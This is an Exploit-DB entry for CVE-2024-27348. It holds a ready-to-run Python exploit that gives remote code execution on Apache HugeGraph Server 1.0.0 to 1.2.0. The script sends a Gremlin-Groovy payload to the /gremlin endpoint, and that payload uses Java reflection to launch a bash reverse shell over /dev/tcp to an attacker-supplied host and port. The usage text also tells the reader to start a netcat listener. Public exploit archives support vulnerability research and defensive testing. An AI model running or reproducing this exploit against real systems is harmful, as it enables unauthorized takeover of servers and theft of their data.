Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)

EDB-ID:

52149

CVE:

2024-27348

EDB Verified:

Author:

Yesith Alvarez

Type:

webapps

Exploit:   /  

Platform:

Java

Date:

2025-04-09

Vulnerable App: 
# Exploit Title: Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://hugegraph.apache.org/docs/download/download/
# Version: Apache HugeGraph 1.0.0 - 1.2.0
# CVE : CVE-2024–27348

from requests import Request, Session
import sys
import json

def title():
    print('''
    
   ______     _______     ____   ___ ____  _  _        ____ _____ _____ _  _    ___  
  / ___\ \   / / ____|   |___ \ / _ \___ \| || |      |___ \___  |___ /| || |  ( _ ) 
 | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ __) | / /  |_ \| || |_ / _ \ 
 | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ __/ / /  ___) |__   _| (_) |
  \____|  \_/  |_____|   |_____|\___/_____|  |_|      |_____/_/  |____/   |_|  \___/ 

[+] Reverse shell                                                                                                                                                                                     
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024–27348/exploit.py
    ''')   


def exploit(url, lhost, lport):       
    payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
    headers = {    
    'Content-Type': 'application/json'}
    s = Session()
    url = url + "/gremlin"
    req = Request('POST', url, json=payload, headers=headers)
    prepped = req.prepare()
    del prepped.headers['Content-Type']
    resp = s.send(prepped,
    verify=False,
    timeout=15)
    print(prepped.headers)
    print(url)
    print(resp.headers)       
    print(payload)
    print(resp.status_code)
    print(resp.text)


if __name__ == '__main__':
    title()
    if(len(sys.argv) < 4):
        print('[+] USAGE: python3 %s https://<target_url> lhost lport \n'%(sys.argv[0]))
        print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n'%(sys.argv[0]))  
        print('[+] Do not forget to run the listener: nc -lvp 4444\n')      
        exit(0)
    else:
        exploit(sys.argv[1],sys.argv[2],sys.argv[3])
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services